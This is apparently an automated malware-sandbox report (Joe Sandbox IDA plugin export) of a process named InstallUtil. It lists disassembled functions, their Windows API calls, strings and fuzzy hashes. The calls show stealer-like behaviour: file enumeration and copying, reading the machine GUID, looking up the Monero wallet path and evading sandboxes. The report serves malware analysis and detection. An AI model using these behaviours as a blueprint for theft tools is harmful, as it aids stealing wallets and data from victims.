                                                                                                                    • Part of subcall function 00415B0B: HeapAlloc.KERNEL32(00000000), ref: 00415B37
                                                                                                                    • Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415B50
                                                                                                                    • Part of subcall function 00415B0B: FindFirstFileA.KERNEL32(?,?), ref: 00415B67
                                                                                                                    • Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A98), ref: 00415B88
                                                                                                                    • Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A9C), ref: 00415BA2
                                                                                                                    • Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415BC9
                                                                                                                    • Part of subcall function 00415B0B: CopyFileA.KERNEL32(?,?,00000001), ref: 00415C86
                                                                                                                    • Part of subcall function 00415B0B: DeleteFileA.KERNEL32(?), ref: 00415CA9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcat$File$Heapwsprintf$AllocAttributesCopyDeleteFindFirstFolderPathProcesslstrcpy
                                                                                                                  • String ID: LzA
                                                                                                                  • API String ID: 1546541418-1388989900
                                                                                                                  • Opcode ID: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
                                                                                                                  • Instruction ID: 3907ee1014e8156982b731ec0efd03be7befdbbf2a83afad572f10a5b305f32e
                                                                                                                  • Opcode Fuzzy Hash: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
                                                                                                                  • Instruction Fuzzy Hash: AC51FBB1A0011C9BCF54DB64DC85ADDB7B9BB4C315F4044EAF609E3250EA35AB89CF58
                                                                                                                  Function 0040FB2D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 159COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0040FB52
                                                                                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0040FB7E
                                                                                                                  • _memset.LIBCMT ref: 0040FBC1
                                                                                                                  • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FD17
                                                                                                                    • Part of subcall function 0040F030: _memmove.LIBCMT ref: 0040F04A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: OpenProcess_memmove_memset
                                                                                                                  • String ID: N0ZWFt
                                                                                                                  • API String ID: 2647191932-431618156
                                                                                                                  • Opcode ID: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
                                                                                                                  • Instruction ID: eb1f70013287725bf786605e83da5f1b289e944c87060308bf9427b65ac1957a
                                                                                                                  • Opcode Fuzzy Hash: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
                                                                                                                  • Instruction Fuzzy Hash: 045191B1D0022C9FDB309F54DC85BDDB7B9AB44308F0001FAA609B7692D6796E89CF59
                                                                                                                  Function 00407FAC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60filememoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                  • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                  • LocalFree.KERNEL32(0040ECBC,?,?,?,?,0040E756,?,?,?), ref: 0040802B
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                  • String ID: V@
                                                                                                                  • API String ID: 2311089104-383300688
                                                                                                                  • Opcode ID: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
                                                                                                                  • Instruction ID: 10e4ee5bcd24e5c00d10c93a2cb3902743b6293cd5753d2e79081f11b23a5eb1
                                                                                                                  • Opcode Fuzzy Hash: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
                                                                                                                  • Instruction Fuzzy Hash: 47116070900204EFDF25DF64DD88EAF7BB9EB48741F20056AF481F2290EB769A85DB11
                                                                                                                  Function 004115D4 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 48registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00411607
                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
                                                                                                                  • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?), ref: 00411657
                                                                                                                  • CharToOemA.USER32(?,?), ref: 0041166B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CharCloseOpenQueryValue_memset
                                                                                                                  • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                  • API String ID: 2235053359-1211650757
                                                                                                                  • Opcode ID: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
                                                                                                                  • Instruction ID: 75e31153c2228976b0cf0a8f1d4bbd960c746e32b60f2683a95406e25632d02a
                                                                                                                  • Opcode Fuzzy Hash: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
                                                                                                                  • Instruction Fuzzy Hash: CC111EB590021DAFDB10DF90DC89FEAB7BDEB08309F4041E6A659E2052D7759F888F14
                                                                                                                  Function 00401A51 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 35registrymemoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00401A6C
                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
                                                                                                                  • RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
                                                                                                                  • RegCloseKey.ADVAPI32(00401AE9), ref: 00401AAD
                                                                                                                  Strings
                                                                                                                  • SOFTWARE\monero-project\monero-core, xrefs: 00401A7F
                                                                                                                  • wallet_path, xrefs: 00401A9C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                  • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                                                                                                  • API String ID: 3466090806-4244082812
                                                                                                                  • Opcode ID: 724872420e6656dc421950b0da405abf7eebffbf311253c609d29da366c3edf5
                                                                                                                  • Instruction ID: a12903c7620fb5d6c8df92349d75cdfb1a5743fd57e0ed8a0c6fb3df1ac1df80
                                                                                                                  • Opcode Fuzzy Hash: 724872420e6656dc421950b0da405abf7eebffbf311253c609d29da366c3edf5
                                                                                                                  • Instruction Fuzzy Hash: ACF03075640304BFEB149B90DC0AFAA7A69DB44B06F141065B601B5190E6B66A509A24
                                                                                                                  Function 00410B30 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40registrymemoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B79
                                                                                                                  • RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B95
                                                                                                                  • RegCloseKey.ADVAPI32(00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B9E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                  • String ID: Windows 11
                                                                                                                  • API String ID: 3466090806-2517555085
                                                                                                                  • Opcode ID: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
                                                                                                                  • Instruction ID: c636f12a4b9fd3341eb7223670fa9a8d4496e2c02347a6f2be12f88bf3247473
                                                                                                                  • Opcode Fuzzy Hash: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
                                                                                                                  • Instruction Fuzzy Hash: 1AF06875600304FBFF149BD1DC4AFAB7A7EEB4470AF1410A5F601D5190E7B6AA909714
                                                                                                                  Function 00410BA9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36registrymemoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BBD
                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BC4
                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BE2
                                                                                                                  • RegQueryValueExA.KERNEL32(00436888,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ), ref: 00410BFD
                                                                                                                  • RegCloseKey.ADVAPI32(00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410C06
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                  • String ID: CurrentBuildNumber
                                                                                                                  • API String ID: 3466090806-1022791448
                                                                                                                  • Opcode ID: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
                                                                                                                  • Instruction ID: adfa9e2f60a12e4d5f9b95a3627e322926d469c0f3b43989f67d349f50e983ff
                                                                                                                  • Opcode Fuzzy Hash: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
                                                                                                                  • Instruction Fuzzy Hash: E9F09075640304BBEF159B90DC0AFAF7A7EEB44B06F240055F601A50A0E6B25A909B50
                                                                                                                  Function 0041566F Relevance: 9.1, APIs: 6, Instructions: 107registrystringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 004156A4
                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 004156C4
                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 004156EA
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004156F6
                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00415725
                                                                                                                  • lstrcatA.KERNEL32(?), ref: 00415738
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcat$CloseOpenQueryValue_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3891774339-0
                                                                                                                  • Opcode ID: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
                                                                                                                  • Instruction ID: 247fa685f6815e34cff7f8df4b350b2d93bc7a81ee75f5ea83cfe721da60279c
                                                                                                                  • Opcode Fuzzy Hash: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
                                                                                                                  • Instruction Fuzzy Hash: 6941CE7194011D9FDF24EF60EC86EE8777ABB18309F4004AAB109A31A0EE759FC59F94
                                                                                                                  Function 00411757 Relevance: 9.1, APIs: 6, Instructions: 58commemoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • __EH_prolog3_catch.LIBCMT ref: 0041175E
                                                                                                                  • CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 0041178E
                                                                                                                  • _wtoi64.MSVCRT ref: 004117C1
                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 004117DA
                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004117E1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 181426013-0
                                                                                                                  • Opcode ID: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
                                                                                                                  • Instruction ID: 49cd324ebe81867dc14fdb11462f5a122b1e841d4163eb6196de4943798d3ef6
                                                                                                                  • Opcode Fuzzy Hash: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
                                                                                                                  • Instruction Fuzzy Hash: 71115170A0424ADFCB019FA4CC999EEBBB5AF48300F54417EF215E72A0CB355945CB59
                                                                                                                  Function 004010F0 Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 004010AA
                                                                                                                  • _memset.LIBCMT ref: 004010D0
                                                                                                                  • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 004010E6
                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,004184CC), ref: 00401100
                                                                                                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00401107
                                                                                                                  • ExitProcess.KERNEL32 ref: 00401112
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1859398019-0
                                                                                                                  • Opcode ID: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
                                                                                                                  • Instruction ID: 2816971d78f640c5210f5c3df2c68b6a36055d88f9abb901e61d14fe4f69d22d
                                                                                                                  • Opcode Fuzzy Hash: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
